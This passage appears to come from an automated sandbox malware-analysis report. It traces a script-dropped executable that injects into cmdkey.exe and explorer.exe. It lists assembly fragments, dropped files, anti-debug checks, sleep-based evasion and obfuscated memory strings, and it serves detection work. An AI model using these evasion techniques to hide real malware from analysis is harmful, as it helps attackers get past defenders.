Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_335F6245 push ecx; iretd	2_2_335F627D
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_335FCE73 push ebp; iretd	2_2_335FCE78
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_335F562C push ss; retf	2_2_335F5636
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_335F6AE9 pushad ; retf	2_2_335F6B10
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_335FCD75 push FFFFFFA0h; retf	2_2_335FCDEA
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_335F61F9 push ecx; iretd	2_2_335F627D
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_335FCDF8 push ebp; iretd	2_2_335FCE78
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_336001A7 push esi; ret	2_2_336001A8
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_335F7585 push sp; ret	2_2_335F7589
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_335F6438 push ebp; retf	2_2_335F643B
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_335F5C32 push ss; iretd	2_2_335F5CB1
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_335F5C8E push ss; iretd	2_2_335F5CB1
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_05C765E5 push FFFFFFA0h; retf	3_2_05C7665A
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_05C70DF5 push sp; ret	3_2_05C70DF9
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_05C6F4FE push ss; iretd	3_2_05C6F521
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_05C6F4A2 push ss; iretd	3_2_05C6F521
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_05C6FCA8 push ebp; retf	3_2_05C6FCAB
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_05C6F458 push ss; iretd	3_2_05C6F521
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_05C797C8 push edi; iretd	3_2_05C797D6
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_05C70359 pushad ; retf	3_2_05C70380
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_05C766E3 push ebp; iretd	3_2_05C766E8
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_05C6EE9C push ss; retf	3_2_05C6EEA6
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_05C6FAB5 push ecx; iretd	3_2_05C6FAED
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_05C6FA69 push ecx; iretd	3_2_05C6FAED
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_05C76668 push ebp; iretd	3_2_05C766E8
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_05C79A17 push esi; ret	3_2_05C79A18
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02BF08CD push ecx; mov dword ptr [esp], ecx	4_2_02BF08D6

Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Local\Temp\temp_executable.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	File created: C:\Users\user\AppData\Local\Temp\nsfBB16.tmp\System.dll			Jump to dropped file

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	API/Special instruction interceptor: Address: 38411BF
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	API/Special instruction interceptor: Address: 25211BF
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	API/Special instruction interceptor: Address: 7FFD57490594
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	API/Special instruction interceptor: Address: 7FFD5748FF74
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	API/Special instruction interceptor: Address: 7FFD5748D6C4
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	API/Special instruction interceptor: Address: 7FFD5748D864
Source: C:\Windows\SysWOW64\cmdkey.exe	API/Special instruction interceptor: Address: 7FFD5748D144
Source: C:\Windows\SysWOW64\cmdkey.exe	API/Special instruction interceptor: Address: 7FFD57490594
Source: C:\Windows\SysWOW64\cmdkey.exe	API/Special instruction interceptor: Address: 7FFD5748D764
Source: C:\Windows\SysWOW64\cmdkey.exe	API/Special instruction interceptor: Address: 7FFD5748D324
Source: C:\Windows\SysWOW64\cmdkey.exe	API/Special instruction interceptor: Address: 7FFD5748D364
Source: C:\Windows\SysWOW64\cmdkey.exe	API/Special instruction interceptor: Address: 7FFD5748D004
Source: C:\Windows\SysWOW64\cmdkey.exe	API/Special instruction interceptor: Address: 7FFD5748FF74
Source: C:\Windows\SysWOW64\cmdkey.exe	API/Special instruction interceptor: Address: 7FFD5748D6C4
Source: C:\Windows\SysWOW64\cmdkey.exe	API/Special instruction interceptor: Address: 7FFD5748D864

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Code function: 2_2_33941763 rdtsc

2_2_33941763

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\SysWOW64\cmdkey.exe	Window / User API: threadDelayed 9852	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 876	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 881	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsfBB16.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	API coverage: 0.3 %
Source: C:\Windows\SysWOW64\cmdkey.exe	API coverage: 1.0 %

Source: C:\Windows\SysWOW64\cmdkey.exe TID: 5272	Thread sleep count: 122 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe TID: 5272	Thread sleep time: -244000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe TID: 5272	Thread sleep count: 9852 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe TID: 5272	Thread sleep time: -19704000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\cmdkey.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmdkey.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 1_2_00402645 FindFirstFileA,	1_2_00402645
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 1_2_00405451 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	1_2_00405451
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 1_2_00405E95 FindFirstFileA,FindClose,	1_2_00405E95
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_00402645 FindFirstFileA,	2_2_00402645
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_00405451 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	2_2_00405451
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_00405E95 FindFirstFileA,FindClose,	2_2_00405E95

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: wscript.exe, 00000000.00000003.12885675270.00000179BB678000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.12883702485.00000179BB678000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.12880854864.00000179BB678000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.12885791745.00000179BB69A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: n8KhOqmjn1kk5Ww4pLiefuzk3MblPGgQ84jIR2dd6UaOyvjm/8MF2Ga4Yn26wlP3Qsxj4OM;;;...&&&4lbSzowCof1/mCg3wGOct+5RRrO&&&Nfu5xzEUHFwlsjGM6S7WujL;;;eWueqzb&&&nv/P))YC4))sXd;;;52uEbgZccpn...EXbPb6FgCXshgfsCK))KDCQ))hdnu&&&49v;;;8IhU
Source: wscript.exe, 00000000.00000003.12899030194.00000179BAE83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.12909028516.00000179BAF1A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.12903822865.00000179BAED6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.12900456014.00000179BAE8F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.12906948112.00000179BAF08000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.12901272680.00000179BAE90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.12901992120.00000179BAEA7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.12909571718.00000179BAF1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.12905720889.00000179BAEDC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.12903315319.00000179BAED5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.12910994957.00000179BAF2C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: r/QmLQi7I9+v&&&90eXgfocGP8R1oDQjXWFZ))X4NN98qo1nmW1UpLHGfSc$
Source: wscript.exe, 00000000.00000003.12918703544.00000179BAFC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.12910524066.00000179BAF4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.12915079016.00000179BAFAA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.12899030194.00000179BAE83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.12909028516.00000179BAF1A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.12919306378.00000179BAFC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.12915639170.00000179BAFB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.12903822865.00000179BAED6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.12900456014.00000179BAE8F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.12914475978.00000179BAF9D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.12906948112.00000179BAF08000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: n8KhOqmjn1kk5Ww4pLiefuzk3MblPGgQ84jIR2dd6UaOyvjm/8MF2Ga4Yn26wlP3Qsxj4OM;;;...&&&4lbSzowCof1/mCg3wGOct+5RRrO&&&Nfu5xzEUHFwlsjGM6S7WujL;;;eWueqzb&&&nv/P))YC4))sXd;;;52uEbgZccpn...EXbPb6FgCXshgfsCK))KDCQ))hdnu&&&49v;;;8Ih
Source: wscript.exe, 00000000.00000003.12881631054.00000179BB5E4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.12880854864.00000179BB5D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.12885145566.00000179BB5E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: r/QmLQi7I9+v&&&90eXgfocGP8R1oDQjXWFZ))X4NN98qo1nmW1UpLHGfS

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	API call chain: ExitProcess graph end node			graph_1-3738
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	API call chain: ExitProcess graph end node			graph_1-3895

Source: C:\Windows\SysWOW64\cmdkey.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Code function: 2_2_33941763 rdtsc

2_2_33941763

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Code function: 1_2_0040231C RegCreateKeyExA,lstrlenA,LdrInitializeThunk,RegSetValueExA,RegCloseKey,

1_2_0040231C

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Code function: 1_2_00405EBC GetModuleHandleA,LoadLibraryA,GetProcAddress,

1_2_00405EBC

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392A390 mov eax, dword ptr fs:[00000030h]	2_2_3392A390
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392A390 mov eax, dword ptr fs:[00000030h]	2_2_3392A390
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392A390 mov eax, dword ptr fs:[00000030h]	2_2_3392A390
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33901380 mov eax, dword ptr fs:[00000030h]	2_2_33901380
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33901380 mov eax, dword ptr fs:[00000030h]	2_2_33901380
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33901380 mov eax, dword ptr fs:[00000030h]	2_2_33901380
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33901380 mov eax, dword ptr fs:[00000030h]	2_2_33901380
